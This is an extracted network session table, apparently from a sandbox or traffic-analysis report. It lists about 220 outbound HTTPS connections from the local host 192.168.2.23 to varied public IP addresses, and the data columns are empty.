                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25221192.168.2.2334980109.106.219.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25222192.168.2.2358580166.180.88.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25223192.168.2.235947877.215.134.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25224192.168.2.2347812116.119.50.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25225192.168.2.2335842157.8.21.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25226192.168.2.2357830211.202.234.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25227192.168.2.2350150210.143.121.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25228192.168.2.2347476204.146.107.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25229192.168.2.234483489.112.133.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25230192.168.2.2360896153.84.207.83443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25231192.168.2.2343026104.59.23.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25232192.168.2.2347656223.69.225.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25233192.168.2.235071041.73.178.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25234192.168.2.2345716123.68.231.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25235192.168.2.2340920146.32.31.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25236192.168.2.2353742169.65.23.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25237192.168.2.2342754138.127.216.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25238192.168.2.2344834165.124.106.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25239192.168.2.235396620.143.140.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25240192.168.2.2338266211.133.197.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25241192.168.2.233710872.137.18.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25242192.168.2.236067461.141.33.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25243192.168.2.234405894.144.242.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25244192.168.2.2356448179.63.17.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25245192.168.2.2341694116.17.232.26443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25246192.168.2.2359478132.245.70.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25247192.168.2.2344788101.62.91.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25248192.168.2.2345778114.202.216.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25249192.168.2.2360228204.71.146.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25250192.168.2.2333304205.142.144.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25251192.168.2.2355432106.118.48.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25252192.168.2.2357904221.150.21.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25253192.168.2.2359046216.222.102.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25254192.168.2.2336480106.100.223.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25255192.168.2.2340888166.216.237.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25256192.168.2.233682023.173.251.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25257192.168.2.235398693.172.21.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25258192.168.2.2344580157.62.238.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25259192.168.2.2357638122.32.131.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25260192.168.2.235157862.7.147.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25261192.168.2.2334536122.96.10.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25262192.168.2.234353683.121.145.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25263192.168.2.2343184134.10.36.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25264192.168.2.235658490.224.213.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25265192.168.2.2358566162.184.3.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25266192.168.2.234305453.229.165.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25267192.168.2.2342734123.69.66.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25268192.168.2.2339804192.149.53.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25269192.168.2.2349268143.220.176.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25270192.168.2.2335922175.222.241.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25271192.168.2.235534875.137.51.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25272192.168.2.233641864.50.107.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25273192.168.2.2340068153.42.251.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25274192.168.2.2343494167.246.95.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25275192.168.2.2358778117.205.146.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25276192.168.2.2356750147.148.218.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25277192.168.2.2343044109.216.66.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25278192.168.2.235315239.140.3.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25279192.168.2.23558648.144.156.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25280192.168.2.233355868.64.49.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25281192.168.2.2346640141.38.127.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25282192.168.2.2352904110.111.201.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25283192.168.2.2339206182.53.114.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25284192.168.2.234143450.86.170.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25285192.168.2.2345596126.59.139.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25286192.168.2.2357868199.95.247.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25287192.168.2.234142458.157.73.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25288192.168.2.2333176218.157.216.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25289192.168.2.2352536204.59.62.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25290192.168.2.2352182122.139.40.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25291192.168.2.235037657.213.90.66443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25292192.168.2.236019090.205.204.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25293192.168.2.2349500157.150.203.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25294192.168.2.2334984118.73.162.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25295192.168.2.234701868.21.63.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25296192.168.2.2359766196.111.167.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25297192.168.2.2336052119.3.212.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25298192.168.2.2341630134.47.14.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25299192.168.2.234294678.64.9.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25300192.168.2.2344416130.14.185.82443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25301192.168.2.2342162117.72.73.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25302192.168.2.2359056137.193.227.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25303192.168.2.233606870.213.55.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25304192.168.2.2357966203.132.146.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25305192.168.2.2351278138.115.163.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25306192.168.2.234588475.219.37.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25307192.168.2.234049439.236.13.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25308192.168.2.234168040.159.104.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25309192.168.2.2335986103.172.181.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25310192.168.2.2346296156.109.37.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25311192.168.2.2341602208.225.100.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25312192.168.2.234667687.159.6.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25313192.168.2.2357362143.117.11.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25314192.168.2.2357156180.155.228.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25315192.168.2.235195288.251.177.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25316192.168.2.2340150200.58.176.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25317192.168.2.233416613.187.174.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25318192.168.2.2347850152.68.51.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25319192.168.2.235386876.76.69.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25320192.168.2.2351168186.24.141.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25321192.168.2.233428625.23.148.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25322192.168.2.2341862110.215.137.208443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25323192.168.2.2348914158.109.81.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25324192.168.2.234233861.96.97.153443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25325192.168.2.2333172170.38.62.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25326192.168.2.2345460142.59.193.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25327192.168.2.235428614.90.38.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25328192.168.2.233968014.160.186.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25329192.168.2.2349370184.236.24.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25330192.168.2.235304072.128.214.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25331192.168.2.23337389.51.49.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25332192.168.2.2342670196.146.204.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25333192.168.2.2333002185.48.16.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25334192.168.2.233760267.98.206.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25335192.168.2.2341558129.232.177.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25336192.168.2.2344388121.60.64.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25337192.168.2.235724875.140.145.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25338192.168.2.235759483.243.239.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25339192.168.2.23516462.30.220.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25340192.168.2.2355780152.192.107.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25341192.168.2.2352164136.34.241.238443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25342192.168.2.234801218.39.243.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25343192.168.2.2336216165.139.168.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25344192.168.2.2337986165.127.70.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25345192.168.2.234107213.183.190.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25346192.168.2.2355884205.5.86.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25347192.168.2.2358718125.246.59.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25348192.168.2.234779670.147.116.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25349192.168.2.2359386197.195.119.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25350192.168.2.2340966112.30.141.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25351192.168.2.2333034170.66.250.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25352192.168.2.2360700220.166.142.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25353192.168.2.2350700131.50.246.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25354192.168.2.23589201.187.51.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25355192.168.2.23537542.200.210.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25356192.168.2.2335092162.94.207.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25357192.168.2.2359392175.231.187.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25358192.168.2.234409669.169.122.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25359192.168.2.2347960112.217.242.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25360192.168.2.233530424.162.196.192443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25361192.168.2.233988634.183.170.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25362192.168.2.2350078177.34.76.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25363192.168.2.2337884121.97.215.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25364192.168.2.2360666143.57.228.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25365192.168.2.2346512155.180.29.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25366192.168.2.2353714119.94.145.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25367192.168.2.2336646178.124.158.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25368192.168.2.2349996158.28.4.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25369192.168.2.2356696200.225.160.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25370192.168.2.234270287.173.161.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25371192.168.2.234130681.215.12.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25372192.168.2.2357994199.99.196.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25373192.168.2.2359094144.116.218.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25374192.168.2.234571699.8.122.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25375192.168.2.2357952104.180.73.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25376192.168.2.2345898146.253.41.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25377192.168.2.2341782208.53.18.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25378192.168.2.233518282.235.132.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25379192.168.2.2359062103.102.62.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25380192.168.2.2353346223.153.105.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25381192.168.2.2350944106.226.227.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25382192.168.2.234725672.197.169.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25383192.168.2.2338078104.192.217.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25384192.168.2.2341682196.74.125.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25385192.168.2.2359946200.239.81.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25386192.168.2.2344134138.155.165.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25387192.168.2.2357282147.59.184.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25388192.168.2.2336588191.149.29.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25389192.168.2.2341346164.126.207.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25390192.168.2.2359672180.110.19.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25391192.168.2.2347852200.107.153.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25392192.168.2.2359212176.81.161.67443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25393192.168.2.2358178133.57.140.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25394192.168.2.235090035.236.53.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25395192.168.2.2353018160.195.179.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25396192.168.2.236040097.238.217.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25397192.168.2.2354522130.118.90.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25398192.168.2.2340308223.51.210.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25399192.168.2.2343706112.52.226.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25400192.168.2.2349508191.72.200.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25401192.168.2.2340174140.234.239.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25402192.168.2.2349828105.52.119.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25403192.168.2.2346986145.193.111.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25404192.168.2.2349878222.148.219.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25405192.168.2.2351004106.215.109.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25406192.168.2.235242232.66.59.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25407192.168.2.2336348185.183.164.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25408192.168.2.2351602121.14.244.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25409192.168.2.234152862.122.109.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25410192.168.2.234148270.193.38.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25411192.168.2.2360958113.232.124.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25412192.168.2.2339810216.154.47.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25413192.168.2.2354236206.227.155.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25414192.168.2.233519458.251.131.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25415192.168.2.233867025.161.3.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25416192.168.2.2348146197.67.112.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25417192.168.2.2339830199.75.129.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25418192.168.2.2351284157.168.252.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25419192.168.2.2342856139.47.129.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25420192.168.2.2359336139.143.160.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25421192.168.2.2342556186.68.145.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25422192.168.2.2338948125.103.217.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25423192.168.2.23522704.125.211.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25424192.168.2.234235282.43.204.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25425192.168.2.233716025.164.153.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25426192.168.2.2351458182.81.99.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25427192.168.2.234905493.82.243.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25428192.168.2.2346720204.21.177.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25429192.168.2.235330448.217.130.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25430192.168.2.2343274111.58.234.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25431192.168.2.2345564223.124.95.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25432192.168.2.2351162104.154.165.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25433192.168.2.2344992206.214.95.127443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25434192.168.2.234508840.118.91.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25435192.168.2.235656275.156.195.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25436192.168.2.233805684.85.169.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25437192.168.2.233504643.81.95.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25438192.168.2.2337600151.237.137.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25439192.168.2.2344954107.87.241.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25440192.168.2.2338300155.201.21.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            25441192.168.2.2342646221.164.31.106443
                                            TimestampBytes transferredDirectionData


